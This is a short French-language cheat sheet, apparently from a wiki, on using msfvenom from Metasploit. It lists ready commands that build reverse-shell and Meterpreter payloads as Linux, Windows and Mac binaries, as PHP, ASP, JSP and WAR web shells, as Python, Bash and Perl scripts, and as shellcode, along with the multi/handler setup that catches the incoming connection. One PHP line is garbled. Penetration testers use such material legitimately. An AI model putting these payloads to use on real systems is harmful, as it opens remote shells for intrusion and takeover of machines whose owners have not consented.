**Générer un payload avec metasploit**
**1.Presentation**
Msfvenom est un logiciel du framework metasploit.
Il permet de générer , encoder , packer des payloads.
__Lister les payloads disponibles__
msfvenom -l
__Générer des binaires__
Pour Linux :
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Pour Windows :
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Pour Mac :
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
__Générer des payloads pour le web__
En PHP :
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
En ASP :
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
En JSP :
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
En WAR :
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
__Générer des payloads pour des langages de scripte__
En Python:
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
En Bash :
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
En Perl :
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
__Générer un shellcode__
Les shellcodes sont à insérer dans votre exploit.
Shellcode basé sur Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Shellcode basé sur windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Shellcode basé sur Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
__Mise en place du handler__
Le handler permet de recevoir la connexion initier par votre payload.
Dans msfconsole :
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Source : [[http://netsec.ws/?p=331]]